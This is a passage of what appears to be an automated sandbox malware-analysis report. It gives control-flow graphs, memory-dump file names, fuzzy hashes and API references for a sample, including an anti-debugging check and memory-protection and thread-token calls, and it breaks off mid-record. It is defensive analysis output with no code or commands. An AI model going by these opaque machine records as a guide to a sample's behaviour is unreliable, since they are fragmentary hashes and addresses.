                                                                                          • 776: 6412e8e-6412e94 -> 775
                                                                                          • 775: 6412e95-6412ed0
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06412E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2309772689.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_6410000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 38e0b93a26c21aff9e24a1a2f6232db2a176b976cea361aead24ec20170e5045
                                                                                          • Instruction ID: b36cfd4f00f91e243158502a71a66de47927a72140229f736c1bcf583f19f984
                                                                                          • Opcode Fuzzy Hash: 38e0b93a26c21aff9e24a1a2f6232db2a176b976cea361aead24ec20170e5045
                                                                                          • Instruction Fuzzy Hash: AC2128B5C002598FCB10CF9AD885BEEBBF4AF48320F14845AE459A7350D778AA44CF61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph (block: address range [API / call target] -> successors)
                                                                                          • 779: 32f8970-32f89f1, VirtualProtect -> 782, 783
                                                                                          • 783: 32f89f3-32f89f9 -> 782
                                                                                          • 782: 32f89fa-32f8a1f
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 032F89E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2239198444.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_32f0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: 35b238f11d85b17248a0fa0ec5db241a61b89bb4e43191b10a1ead82e0131ad3
                                                                                          • Instruction ID: 428cdc5039703f6647f9562b459d395b51a4ec2aacd56880ce2505b29f88dc80
                                                                                          • Opcode Fuzzy Hash: 35b238f11d85b17248a0fa0ec5db241a61b89bb4e43191b10a1ead82e0131ad3
                                                                                          • Instruction Fuzzy Hash: 431136B1D003098FCB10DFAAC881AAEFBF4FF48320F14842AD519A7200C775A940CFA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph (block: address range [API / call target] -> successors)
                                                                                          • 1011: 64dbf50-64dbf74 -> 1012, 1013
                                                                                          • 1012: 64dbfdc-64dbfe3 -> 1014, 1015
                                                                                          • 1013: 64dbf76-64dbfd4 -> 1012
                                                                                          • 1014: 64dbfe5-64dc019 -> 1022
                                                                                          • 1015: 64dc056-64dc067 -> 1016, 1017
                                                                                          • 1016: 64dc06e-64dc090 -> 1025, 1026
                                                                                          • 1017: 64dc069 -> 1016
                                                                                          • 1022: 64dc021-64dc04a -> 1049, 1050
                                                                                          • 1025: 64dc0ff-64dc194, call 64d7550 -> 1038
                                                                                          • 1026: 64dc092-64dc09b -> 1028, 1029
                                                                                          • 1028: 64dc09d-64dc0a2 -> 1029
                                                                                          • 1029: 64dc0aa-64dc0b0 -> 1033, 1034
                                                                                          • 1033: 64dc0b6-64dc0ba -> 1025, 1037
                                                                                          • 1034: 64dc1b0 -> 1038
                                                                                          • 1037: 64dc0bc-64dc0c5 -> 1040, 1041
                                                                                          • 1038: 64dc1b5-64dc1bb -> 1043, 1044
                                                                                          • 1040: 64dc0d4-64dc0da -> 1034, 1046
                                                                                          • 1041: 64dc0c7-64dc0cc -> 1040
                                                                                          • 1043: 64dc1bd -> 1044
                                                                                          • 1044: 64dc1c5 -> 1049
                                                                                          • 1046: 64dc0e0-64dc0fa -> 1038
                                                                                          • 1049: 64dc1fc-64dc24e -> 1059
                                                                                          • 1050: 64dc050 -> 1015
                                                                                          • 1059: 64dc250-64dc256 -> 1060, 1061
                                                                                          • 1060: 64dc25c -> 1061
                                                                                          • 1061: 64ddfda-64ddfde -> 1062, 1063
                                                                                          • 1062: 64ddfe4-64ddfef -> 1059
                                                                                          • 1063: 64dec87-64deca0 -> 1069, 1070
                                                                                          • 1069: 64dec7e-64dec84 -> 1063
                                                                                          • 1070: 64deca2-64deca7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: eba1ea71beb4a5b544d4a12dff8b515c78434cef15b7a19070b136469faef095
                                                                                          • Instruction ID: c0c8a7afdbcc595b6848ae846350673dae2cf7afef79d73b4500804948f78c0e
                                                                                          • Opcode Fuzzy Hash: eba1ea71beb4a5b544d4a12dff8b515c78434cef15b7a19070b136469faef095
                                                                                          • Instruction Fuzzy Hash: 0C910470A002048FDB55DF68C594AAEBBF6FF8A710F51866AE4159B3A1DB35EC01CF90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph (block: address range [API / call target] -> successors)
                                                                                          • 1096: 32f8b40-32f8baf, CloseHandle -> 1099, 1100
                                                                                          • 1100: 32f8bb1-32f8bb7 -> 1099
                                                                                          • 1099: 32f8bb8-32f8bdd
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2239198444.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_32f0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c06eb1b024f79769882d94a856fe1cfed8818057e0d1da92f1771290abbad5d2
                                                                                          • Instruction ID: 77145e3c695575d04425e715cb12ea5b89a468c15b2e478414f054db2951b091
                                                                                          • Opcode Fuzzy Hash: c06eb1b024f79769882d94a856fe1cfed8818057e0d1da92f1771290abbad5d2
                                                                                          • Instruction Fuzzy Hash: F090023504464C8B465027997449A5A776CA5455397840051E50D5151A9A5964114695
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.2310003971.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_64d0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5b2568044e6d1beaf2317f6e8277272dc543be1804d93f3e4011726d02036034
                                                                                          • Instruction ID: 33078c73bf9e6c119c925f0dddc70ac1de7b4dee15508cb8d7f7f0bad8f2f65a
                                                                                          • Opcode Fuzzy Hash: 5b2568044e6d1beaf2317f6e8277272dc543be1804d93f3e4011726d02036034
                                                                                          • Instruction Fuzzy Hash: 1AB01234540144AFD3504E10DD5865932219741301F0042515002A21548A301C418B00

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.5%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:3
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 24279 81d7860 24280 81d78a3 SetThreadToken 24279->24280 24281 81d78d1 24280->24281

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 896 bbb488-bbb4b1 898 bbb4b3 896->898 899 bbb4b6-bbb7f1 call bba99c 896->899 898->899 960 bbb7f6-bbb7fd 899->960
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7b76a065933899d8d52ccaf9424c32be1f7432099d97ac103b8024d69216547
                                                                                          • Instruction ID: 853e76718f18e8443b9462809df1d91cc8f996f18a2a14379a9c2ffb3264e9a3
                                                                                          • Opcode Fuzzy Hash: d7b76a065933899d8d52ccaf9424c32be1f7432099d97ac103b8024d69216547
                                                                                          • Instruction Fuzzy Hash: AC91C1B1F007045BDB18EFB589116AEBBF2EF84B00B44896EE106AB354EF745E058BC1

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 961 bbb498-bbb4b1 962 bbb4b3 961->962 963 bbb4b6-bbb7f1 call bba99c 961->963 962->963 1024 bbb7f6-bbb7fd 963->1024
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0262a849bfe0ed8f553c44ccdd79ed057ccfec75ee307bada68dd98f2604b623
                                                                                          • Instruction ID: 9f6d5ed0638dea32a2afef18277b4673062811a297168e1c832c9b9bc2c7b571
                                                                                          • Opcode Fuzzy Hash: 0262a849bfe0ed8f553c44ccdd79ed057ccfec75ee307bada68dd98f2604b623
                                                                                          • Instruction Fuzzy Hash: E191C1B1F007045BDB19EFB589116AEBBF2EF84B00B44896EE106AB354EF745E058BC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$tPfq$tPfq$tPfq$tPfq$tPfq$tPfq$$fq$$fq$$fq$l$l
                                                                                          • API String ID: 0-141213714
                                                                                          • Opcode ID: 24af4b3fc80d2af0bc7d556c3a90afbf7d8a95ed6569deeb50b1f6d2c7bd7834
                                                                                          • Instruction ID: 1a2a7e811480c5a03eeabfac6a6207eecce36732cc4cebced7c1280753752df7
                                                                                          • Opcode Fuzzy Hash: 24af4b3fc80d2af0bc7d556c3a90afbf7d8a95ed6569deeb50b1f6d2c7bd7834
                                                                                          • Instruction Fuzzy Hash: 8C924DB1B24246CFDB29DB7988017AABFE1BF86314F1480AAE545DB252DF71CC41C7A1

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 369 7243ce8-7243d0d 370 7243f00-7243f1c 369->370 371 7243d13-7243d18 369->371 379 7243ef2-7243efd 370->379 380 7243f1e-7243f4a 370->380 372 7243d30-7243d34 371->372 373 7243d1a-7243d20 371->373 377 7243eb0-7243eba 372->377 378 7243d3a-7243d3c 372->378 375 7243d24-7243d2e 373->375 376 7243d22 373->376 375->372 376->372 381 7243ebc-7243ec5 377->381 382 7243ec8-7243ece 377->382 383 7243d4c 378->383 384 7243d3e-7243d4a 378->384 385 7243f50-7243f55 380->385 386 72440ce-7244112 380->386 387 7243ed4-7243ee0 382->387 388 7243ed0-7243ed2 382->388 390 7243d4e-7243d50 383->390 384->390 392 7243f57-7243f5d 385->392 393 7243f6d-7243f71 385->393 403 7244228-724425d 386->403 404 7244118-724411d 386->404 394 7243ee2-7243ef1 387->394 388->394 390->377 395 7243d56-7243d75 390->395 396 7243f61-7243f6b 392->396 397 7243f5f 392->397 400 7243f77-7243f79 393->400 401 7244080-724408a 393->401 394->379 425 7243d85 395->425 426 7243d77-7243d83 395->426 396->393 397->393 405 7243f89 400->405 406 7243f7b-7243f87 400->406 407 7244097-724409d 401->407 408 724408c-7244094 401->408 427 724425f-7244281 403->427 428 724428b-7244295 403->428 414 7244135-7244139 404->414 415 724411f-7244125 404->415 410 7243f8b-7243f8d 405->410 406->410 411 72440a3-72440af 407->411 412 724409f-72440a1 407->412 410->401 416 7243f93-7243fb2 410->416 417 72440b1-72440cb 411->417 412->417 420 724413f-7244141 414->420 421 72441da-72441e4 414->421 422 7244127 415->422 423 7244129-7244133 415->423 456 7243fb4-7243fc0 416->456 457 7243fc2 416->457 429 7244151 420->429 430 7244143-724414f 420->430 431 72441e6-72441ee 421->431 432 72441f1-72441f7 421->432 422->414 423->414 435 7243d87-7243d89 425->435 426->435 473 72442d5-72442fe 427->473 474 7244283-7244288 427->474 440 7244297-724429c 428->440 441 724429f-72442a5 428->441 436 7244153-7244155 429->436 430->436 438 72441fd-7244209 432->438 439 72441f9-72441fb 432->439 
435->377 442 7243d8f-7243d96 435->442 436->421 443 724415b-724415d 436->443 444 724420b-7244225 438->444 439->444 446 72442a7-72442a9 441->446 447 72442ab-72442b7 441->447 442->370 449 7243d9c-7243da1 442->449 450 7244177-724417e 443->450 451 724415f-7244165 443->451 454 72442b9-72442d2 446->454 447->454 458 7243da3-7243da9 449->458 459 7243db9-7243dc8 449->459 462 7244196-72441d7 450->462 463 7244180-7244186 450->463 460 7244167 451->460 461 7244169-7244175 451->461 468 7243fc4-7243fc6 456->468 457->468 469 7243dad-7243db7 458->469 470 7243dab 458->470 459->377 479 7243dce-7243dec 459->479 460->450 461->450 471 7244188 463->471 472 724418a-7244194 463->472 468->401 476 7243fcc-7244003 468->476 469->459 470->459 471->462 472->462 487 7244300-7244326 473->487 488 724432d-724435c 473->488 495 7244005-724400b 476->495 496 724401d-7244024 476->496 479->377 492 7243df2-7243e17 479->492 487->488 497 7244395-724439f 488->497 498 724435e-724437b 488->498 492->377 519 7243e1d-7243e24 492->519 499 724400d 495->499 500 724400f-724401b 495->500 501 7244026-724402c 496->501 502 724403c-724407d 496->502 504 72443a1-72443a5 497->504 505 72443a8-72443ae 497->505 515 72443e5-72443ea 498->515 516 724437d-724438f 498->516 499->496 500->496 507 7244030-724403a 501->507 508 724402e 501->508 511 72443b4-72443c0 505->511 512 72443b0-72443b2 505->512 507->502 508->502 517 72443c2-72443e2 511->517 512->517 515->516 516->497 523 7243e26-7243e41 519->523 524 7243e6a-7243e9d 519->524 528 7243e43-7243e49 523->528 529 7243e5b-7243e5f 523->529 535 7243ea4-7243ead 524->535 531 7243e4d-7243e59 528->531 532 7243e4b 528->532 533 7243e66-7243e68 529->533 531->529 532->529 533->535
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$4'fq$4'fq$4'fq
                                                                                          • API String ID: 0-359900465
                                                                                          • Opcode ID: 4a6ed5e49a81f528b024aa72c747216562934f6a93119ea91e4e84a57da4ab5e
                                                                                          • Instruction ID: f91a4e5216cff5bf8294984f8a017fa5ab70fcb455e0ef7dec300cc6b5cda17b
                                                                                          • Opcode Fuzzy Hash: 4a6ed5e49a81f528b024aa72c747216562934f6a93119ea91e4e84a57da4ab5e
                                                                                          • Instruction Fuzzy Hash: A6123AB1B24246CFDB29EB7884117AABFB29FD1314F1480AAD545DF252DB31DC81CBA1

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 540 72417b8-72417da 541 72417e0-72417e5 540->541 542 7241969-72419b5 540->542 543 72417e7-72417ed 541->543 544 72417fd-7241801 541->544 550 7241b04-7241b25 542->550 551 72419bb-72419c0 542->551 546 72417f1-72417fb 543->546 547 72417ef 543->547 548 7241914-724191e 544->548 549 7241807-724180b 544->549 546->544 547->544 552 7241920-7241929 548->552 553 724192c-7241932 548->553 554 724180d-724181e 549->554 555 724184b 549->555 572 7241b27-7241b34 550->572 573 7241b8d 550->573 556 72419c2-72419c8 551->556 557 72419d8-72419dc 551->557 560 7241934-7241936 553->560 561 7241938-7241944 553->561 554->542 578 7241824-7241829 554->578 558 724184d-724184f 555->558 562 72419cc-72419d6 556->562 563 72419ca 556->563 567 7241ab4-7241abe 557->567 568 72419e2-72419e4 557->568 558->548 564 7241855-7241859 558->564 565 7241946-7241966 560->565 561->565 562->557 563->557 564->548 570 724185f-7241863 564->570 576 7241ac0-7241ac9 567->576 577 7241acc-7241ad2 567->577 574 72419f4 568->574 575 72419e6-72419f2 568->575 579 7241865-724186e 570->579 580 7241886 570->580 582 7241b44 572->582 583 7241b36-7241b42 572->583 584 72419f6-72419f8 574->584 575->584 588 7241ad4-7241ad6 577->588 589 7241ad8-7241ae4 577->589 586 7241841-7241849 578->586 587 724182b-7241831 578->587 590 7241875-7241882 579->590 591 7241870-7241873 579->591 593 7241889-7241911 580->593 592 7241b46-7241b48 582->592 583->592 584->567 594 72419fe-7241a16 584->594 586->558 595 7241835-724183f 587->595 596 7241833 587->596 597 7241ae6-7241b01 588->597 589->597 599 7241884 590->599 591->599 600 7241b7c-7241b86 592->600 601 7241b4a-7241b50 592->601 612 7241a30-7241a34 594->612 613 7241a18-7241a1e 594->613 595->586 596->586 599->593 605 7241b90-7241b96 600->605 606 7241b88-7241b8c 600->606 608 7241b52-7241b54 601->608 609 7241b5e-7241b79 601->609 614 7241b9c-7241ba8 605->614 615 7241b98-7241b9a 605->615 606->573 608->609 
623 7241a3a-7241a41 612->623 617 7241a20 613->617 618 7241a22-7241a2e 613->618 621 7241baa-7241bc1 614->621 615->621 617->612 618->612 626 7241a43-7241a46 623->626 627 7241a48-7241aa5 623->627 629 7241aaa-7241ab1 626->629 627->629
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2048432258.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_7240000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: l$l
                                                                                          • API String ID: 0-2387566905
                                                                                          • Opcode ID: 2367ed28765d2bb99e36803bedb08af9f870d533386cfba663bdcb83538e1f28
                                                                                          • Instruction ID: a2911950724c5a12cc5624fc99957c326ef4dd009461ade8e84c4c356a3d02fb
                                                                                          • Opcode Fuzzy Hash: 2367ed28765d2bb99e36803bedb08af9f870d533386cfba663bdcb83538e1f28
                                                                                          • Instruction Fuzzy Hash: 66B138B2B2421ADFCB189F6DC8016AABBE6AFC5210F14C07AD505DB251DB31DDE1C7A1

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 638 81d785b-81d789b 639 81d78a3-81d78cf SetThreadToken 638->639 640 81d78d8-81d78f5 639->640 641 81d78d1-81d78d7 639->641 641->640
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2053588343.00000000081D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_81d0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: 44dc13c7d5f59f3d8fc127eb4f075686453305971f11d92272aecdc38faba4ef
                                                                                          • Instruction ID: c6b2def7f64dc94bb219f8e100e7aaf665cea4d1c4acfbd9ed6ca921a6e60bff
                                                                                          • Opcode Fuzzy Hash: 44dc13c7d5f59f3d8fc127eb4f075686453305971f11d92272aecdc38faba4ef
                                                                                          • Instruction Fuzzy Hash: EB1102B59002498FCB10DFAAC585BDEBFF4AF88320F24886AD459A7350C774A944CFA1

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 644 81d7860-81d78cf SetThreadToken 646 81d78d8-81d78f5 644->646 647 81d78d1-81d78d7 644->647 647->646
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.2053588343.00000000081D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_81d0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3254676861-0
                                                                                          • Opcode ID: 5045068775fe1bd24c074e21351a0fc746b7938d93e60bd16cf5ac163a5ef72f
                                                                                          • Instruction ID: 9f1706b32a405e24949ec4b7f56d236ad56215cf292160b143678f5d240858d4
                                                                                          • Opcode Fuzzy Hash: 5045068775fe1bd24c074e21351a0fc746b7938d93e60bd16cf5ac163a5ef72f
                                                                                          • Instruction Fuzzy Hash: 9F11F5B59003498FCB10DF9AC985B9EFBF8EF88324F24845AD518A7350D774A944CFA1

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 650 bb6fc8-bb6fe7 651 bb70ed-bb712b 650->651 652 bb6fed-bb6ff0 650->652 680 bb6ff2 call bb767f 652->680 681 bb6ff2 call bb7664 652->681 654 bb6ff8-bb700a 655 bb700c 654->655 656 bb7016-bb702b 654->656 655->656 661 bb7031-bb7041 656->661 662 bb70b6-bb70cf 656->662 665 bb704d-bb705b call bbbf18 661->665 666 bb7043 661->666 667 bb70da-bb70db 662->667 668 bb70d1 662->668 672 bb7061-bb7065 665->672 666->665 667->651 668->667 673 bb7067-bb7077 672->673 674 bb70a5-bb70b0 672->674 675 bb7079-bb7091 673->675 676 bb7093-bb709d 673->676 674->661 674->662 675->674 676->674 680->654 681->654
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (jq
                                                                                          • API String ID: 0-3225323518
                                                                                          • Opcode ID: 094009eccfb73cc8660418fd9a856618d64bc7b85b84fb158aebae4eb3d2773b
                                                                                          • Instruction ID: 3467115f8f3b86c95f7f2c545176226a8d5d0ba8d5a3de890f12e5b8db2f6754
                                                                                          • Opcode Fuzzy Hash: 094009eccfb73cc8660418fd9a856618d64bc7b85b84fb158aebae4eb3d2773b
                                                                                          • Instruction Fuzzy Hash: 02414C34B142048FDB04DB68C598AAEBBF2EF8E311F148499E506AB391DE71DD01CB65

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 682 bbafa0-bbafa9 call bba6a0 684 bbafae-bbafb2 682->684 685 bbafc2-bbb05d 684->685 686 bbafb4-bbafc1 684->686 693 bbb05f-bbb065 685->693 694 bbb066-bbb083 685->694 693->694
                                                                                          Strings
                                                                                          Memory Dump Source
